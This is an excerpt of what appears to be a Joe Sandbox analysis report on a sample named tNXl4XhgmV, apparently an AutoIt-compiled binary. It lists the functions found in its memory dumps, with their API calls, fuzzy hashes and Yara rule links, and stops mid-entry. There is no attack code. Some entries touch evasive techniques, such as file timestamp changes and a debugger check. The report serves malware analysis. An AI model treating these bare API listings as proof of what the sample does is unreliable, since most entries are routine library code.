Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54cf90a67e5fef4439b5b0e64c8600cbf147c9aaffdb1a3c7f71ccb3c2c584c7
Instruction ID: e003a823bdc3d0297dfa81820415280932abf620b602637ce4d66c6878cf03fc
Opcode Fuzzy Hash: 54cf90a67e5fef4439b5b0e64c8600cbf147c9aaffdb1a3c7f71ccb3c2c584c7
Instruction Fuzzy Hash: 62F13670A083499FCB14DF28C580A6ABBE5FF99314F14892EF9999B351D730E945CF82

Function 0018434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00184370
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00184415
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00184432

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: e4c4bd125e0cca2398d3f87411fcf8e078912e591b11a29733534b5819a2fec3
Instruction ID: b7febb7cc230453044af7616367cd97cd765133f546c3a318677a825d9fedaa8
Opcode Fuzzy Hash: e4c4bd125e0cca2398d3f87411fcf8e078912e591b11a29733534b5819a2fec3
Instruction Fuzzy Hash: 253195745047128FD721EF64D88469BBBF8FB59304F00092EF9DA82251EB716A44CF52

Function 001A571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 001A5733

Part of subcall function 001AA16B: __NMSG_WRITE.LIBCMT ref: 001AA192
Part of subcall function 001AA16B: __NMSG_WRITE.LIBCMT ref: 001AA19C

__NMSG_WRITE.LIBCMT ref: 001A573A

Part of subcall function 001AA1C8: GetModuleFileNameW.KERNEL32(00000000,002433BA,00000104,?,00000001,00000000), ref: 001AA25A
Part of subcall function 001AA1C8: ___crtMessageBoxW.LIBCMT ref: 001AA308

Part of subcall function 001A309F: ___crtCorExitProcess.LIBCMT ref: 001A30A5
Part of subcall function 001A309F: ExitProcess.KERNEL32 ref: 001A30AE

Part of subcall function 001A8B28: __getptd_noexit.LIBCMT ref: 001A8B28

RtlAllocateHeap.NTDLL(01120000,00000000,00000001,00000000,?,?,?,001A0DD3,?), ref: 001A575F

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: f6c905701418d1b388c5ef54c634d9c28f6ceae90fdd946085bb6c346c3cf43c
Instruction ID: 6572da8a8ca43a5c0fcb803e9c55fb5670d7b5459f05a4ecf027c2732a778ba1
Opcode Fuzzy Hash: f6c905701418d1b388c5ef54c634d9c28f6ceae90fdd946085bb6c346c3cf43c
Instruction Fuzzy Hash: 8801F53D648B01EAD71567B4EC86B2E73599F53361FA10025F515FA182DFB09C404660

Function 001E98A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,001E9548,?,?,?,?,?,00000004), ref: 001E98BB
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,001E9548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 001E98D1
CloseHandle.KERNEL32(00000000,?,001E9548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 001E98D8

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: ea19937d0e69787a46e00ce508db6aae3273cda4e13dc8274ead11466b72efda
Instruction ID: 0340c40e5b5490b45eeda576440d3b26abacfe374d80bd92d73316cca551858c
Opcode Fuzzy Hash: ea19937d0e69787a46e00ce508db6aae3273cda4e13dc8274ead11466b72efda
Instruction Fuzzy Hash: D7E08632180318B7D7311B54FD0DFCE7B19AB06B70F104220FB14694E187B1151197D8

Function 001E8D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 001E8D1B

Part of subcall function 001A2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,001A9A24), ref: 001A2D69
Part of subcall function 001A2D55: GetLastError.KERNEL32(00000000,?,001A9A24), ref: 001A2D7B

_free.LIBCMT ref: 001E8D2C
_free.LIBCMT ref: 001E8D3E

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: e92dce40d9500f9ac2a34e83b90a716ef22a9282606ba49fbfd8bfa905bb999e
Instruction ID: d38d038ee6a5212ad4ccbfdedbe8c4d95837bf84f0cce5fd9e43ce5ffb3ce3ab
Opcode Fuzzy Hash: e92dce40d9500f9ac2a34e83b90a716ef22a9282606ba49fbfd8bfa905bb999e
Instruction Fuzzy Hash: CBE017A1601A4146CB25A6FEAD40A9B23EC6FA9762B140D1EF40DD7187CF74F8828128

Function 0018A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 001BFC01

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 296fc4f301156a0e471cd8add05447be7af2838dfc683a37a88f81d63c8fb73d
Instruction ID: b4bd9a4480752f0eb6ac7078d17aceae1c67a44b4c12f247e519b7395cd17866
Opcode Fuzzy Hash: 296fc4f301156a0e471cd8add05447be7af2838dfc683a37a88f81d63c8fb73d
Instruction Fuzzy Hash: E5227A74508301DFDB28EF14C494A6ABBE1BF99304F55895EE88A8B361D735EE41CF82

Function 00187A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00187AAB
_memmove.LIBCMT ref: 00187B16

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 8787708196ce45b0a8645caae1a99237cce191730ca2271c137f8889e79cc621
Instruction ID: 099f84427fe6f24904a5bb1a9c8c4c166a4416b9579a57ba98cf3d16ee5b5669
Opcode Fuzzy Hash: 8787708196ce45b0a8645caae1a99237cce191730ca2271c137f8889e79cc621
Instruction Fuzzy Hash: 113188B6604506AFC708EF68C8D1D69F3A5FF593107298629E519CB3D1EB30EA50CF90

Function 001847D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00184834

Part of subcall function 001A336C: __lock.LIBCMT ref: 001A3372
Part of subcall function 001A336C: DecodePointer.KERNEL32(00000001,?,00184849,001D7C74), ref: 001A337E
Part of subcall function 001A336C: EncodePointer.KERNEL32(?,?,00184849,001D7C74), ref: 001A3389

Part of subcall function 001848FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00184915
Part of subcall function 001848FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0018492A

Part of subcall function 00183B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00183B68
Part of subcall function 00183B3A: IsDebuggerPresent.KERNEL32 ref: 00183B7A
Part of subcall function 00183B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,002452F8,002452E0,?,?), ref: 00183BEB
Part of subcall function 00183B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00183C6F

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00184874

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: e19bddbf8ac25e68fca62f7f328160ab230e995295f5e18f41e09add46dbc075
Instruction ID: 80ff0036c7140876c69e014ce9286b720a797697dd03e3e683c93d7d6c9edcec
Opcode Fuzzy Hash: e19bddbf8ac25e68fca62f7f328160ab230e995295f5e18f41e09add46dbc075
Instruction Fuzzy Hash: 8C118E759087569BCB10EF68E80991ABFE8EF96750F10451BF481872B2DBB09644CF92

Function 001A0DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001A571C: __FF_MSGBANNER.LIBCMT ref: 001A5733
Part of subcall function 001A571C: __NMSG_WRITE.LIBCMT ref: 001A573A
Part of subcall function 001A571C: RtlAllocateHeap.NTDLL(01120000,00000000,00000001,00000000,?,?,?,001A0DD3,?), ref: 001A575F

std::exception::exception.LIBCMT ref: 001A0DEC
__CxxThrowException@8.LIBCMT ref: 001A0E01

Part of subcall function 001A859B: RaiseException.KERNEL32(?,?,?,00239E78,00000000,?,?,?,?,001A0E06,?,00239E78,?,00000001), ref: 001A85F0

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 0b142607de0b7ba2f6a045ec84100cbb31e1e404231a0d88c63aaddedb8c4788
Instruction ID: 3a7d6e89c76b956f69eb02a9de7b85ecacfb382c2e23f5ce6b680902f33b81c0
Opcode Fuzzy Hash: 0b142607de0b7ba2f6a045ec84100cbb31e1e404231a0d88c63aaddedb8c4788
Instruction Fuzzy Hash: 58F0A43A904319A6CF11AEE4EC01ADE77ACAF2B311F100426FD04A6291DFB19AA492D1

Function 001A55FD Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 001A562C
__lock_file.LIBCMT ref: 001A564D

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: 3e4de136968e3154b5360437cc8bc372c213d2c093bcd3aa887a5b91cd9549f9
Instruction ID: f153560337399c40c53459e6cd7717c238d389399305ca78d910b474765feb1f
Opcode Fuzzy Hash: 3e4de136968e3154b5360437cc8bc372c213d2c093bcd3aa887a5b91cd9549f9
Instruction Fuzzy Hash: 4D01A779804A08EBCF12AFA89D0649F7F73AFA3361F544115F8181B192DB318A61DF91

Function 001A53A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001A8B28: __getptd_noexit.LIBCMT ref: 001A8B28

__lock_file.LIBCMT ref: 001A53EB

Part of subcall function 001A6C11: __lock.LIBCMT ref: 001A6C34

__fclose_nolock.LIBCMT ref: 001A53F6

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: e594fc38efa38019efa00ce53a4e7c733bec1e5b27a50a6d80a9bccb1783ed68
Instruction ID: c9d3faed7bd669128aa85fdf35ed234bb921781de6ae40bb2ce9f4e41fa18ee2
Opcode Fuzzy Hash: e594fc38efa38019efa00ce53a4e7c733bec1e5b27a50a6d80a9bccb1783ed68
Instruction Fuzzy Hash: 84F02B79804B009ADF107F7588017AE77E17F93374F218104E420AB1C1CFFC49015B51

Function 01161578 Relevance: 1.7, APIs: 1, Instructions: 165COMMON

Download Yara Rule

APIs

Part of subcall function 01160DE8: GetFileAttributesW.KERNELBASE(?), ref: 01160DF3

CreateDirectoryW.KERNELBASE(?,00000000), ref: 011616CB

Memory Dump Source

Source File: 00000001.00000002.1290068241.0000000001160000.00000040.00000020.00020000.00000000.sdmp, Offset: 01160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1160000_tNXl4XhgmV.jbxd

Similarity

API ID: AttributesCreateDirectoryFile
String ID:
API String ID: 3401506121-0
Opcode ID: 42b61cf951942dd4082244d8b318a8bd98d06f190e0fd2dcbca34ccac212e600
Instruction ID: 1032bbf6c0832322f10cb3c588f5ac56bb99cba84a810bdb1a15902aa71ba4f9
Opcode Fuzzy Hash: 42b61cf951942dd4082244d8b318a8bd98d06f190e0fd2dcbca34ccac212e600
Instruction Fuzzy Hash: 4551983191120997EF14EFA0C844BEF733DEF98300F108568A609F7290EB7A9B55C755

Function 001A0C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 001A0CB7

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: f2e900c61e46f47225e70e547acb0a344753676f6916813302728d0a7dd8e9e4
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: FA31F5B8A001059BC71ADF18C484969F7A6FB4A320B2587E5E80ACB35AD731EDD1DBC0

Function 001BFCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 001BFCB7

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 0b8fb699ca3438d04d90dc12a4100808164981eb1d7e8276ade061499ce33b6f
Instruction ID: 9d16488daaceb81c7774190ed29d4f8e85e2558b7bd317a8b07943cd2f5dd5e2
Opcode Fuzzy Hash: 0b8fb699ca3438d04d90dc12a4100808164981eb1d7e8276ade061499ce33b6f
Instruction Fuzzy Hash: 64411574608341CFDB25DF54C488B1ABBE0BF49318F0989ACE8998B762C332E945CF52

Function 00187B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00187BB3

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 4e18706b23c5903c14b02e7b39803dd7b1920b6dc966a732d7ca82c122bda8e8
Instruction ID: d1ae580c49bbe53fe267683546674c7c05ed970a17e582bfe0cfb15206022f70
Opcode Fuzzy Hash: 4e18706b23c5903c14b02e7b39803dd7b1920b6dc966a732d7ca82c122bda8e8
Instruction Fuzzy Hash: BA21F172A04A19EBDB189F25F8416E97FF4FF19350F21842AE886C51A0EB70D1E0DB45

Function 00184DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00184BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00184BEF

Part of subcall function 001A525B: __wfsopen.LIBCMT ref: 001A5266

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,002452F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00184E0F

Part of subcall function 00184B6A: FreeLibrary.KERNEL32(00000000), ref: 00184BA4

Part of subcall function 00184C70: _memmove.LIBCMT ref: 00184CBA

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 1403e2327fbc16f9121fc93406552da00ba1c9ec76e9b7cb01b392089d2b51bf
Instruction ID: bb98faa5daac13ef8973287b20b64a0d9f48c5b44896f6eae7dc435418d86a6a
Opcode Fuzzy Hash: 1403e2327fbc16f9121fc93406552da00ba1c9ec76e9b7cb01b392089d2b51bf
Instruction Fuzzy Hash: E311E032600706ABCF24FF74C856FAE77A9AF54710F108829F942A7182EF759B009F50

Function 001BFD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 001BFD91

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: d1076cfd66077fb7cd9c73d6b202863a677aad5b0af1f26e8971bfa87c86cf51
Instruction ID: c46a4a34d703a6c09e092a3d4f1c49c10c88859ea82fe7268320db2eb13c59be
Opcode Fuzzy Hash: d1076cfd66077fb7cd9c73d6b202863a677aad5b0af1f26e8971bfa87c86cf51
Instruction Fuzzy Hash: 44213374908341DFDB25EF64C444B2ABBE0BF89304F05896CE98A87722D731E905CF92

Function 001A4863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 001A48A6

Part of subcall function 001A8B28: __getptd_noexit.LIBCMT ref: 001A8B28

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 416c87ccfceceb631d42e59c20eaab741801251765ff1de92fe590d9fae5cc95
Instruction ID: 418afcc350f08ba3aeaa579c3b95b4bd6e4c758e30dfec8d585a1f6753bf3141
Opcode Fuzzy Hash: 416c87ccfceceb631d42e59c20eaab741801251765ff1de92fe590d9fae5cc95
Instruction Fuzzy Hash: 20F02239800208EBDF11AFF49C063AE36A0AFA3334F058414F4209B182CBFC8951DB51

Function 00184E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,002452F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00184E7E

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: fb36398f95c6da5cb392151265c1c2fa349dcbba3986bfb04bf95af75cdfe371
Instruction ID: ad84927b7915c43cfe3b3c010043b095a65857f333acedb1ebe69cd37138f556
Opcode Fuzzy Hash: fb36398f95c6da5cb392151265c1c2fa349dcbba3986bfb04bf95af75cdfe371
Instruction Fuzzy Hash: CDF03971505712CFCB38AF64E494822BBE1BF553293218A3EE2DA82620CB3A9940DF40

Function 001A0791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

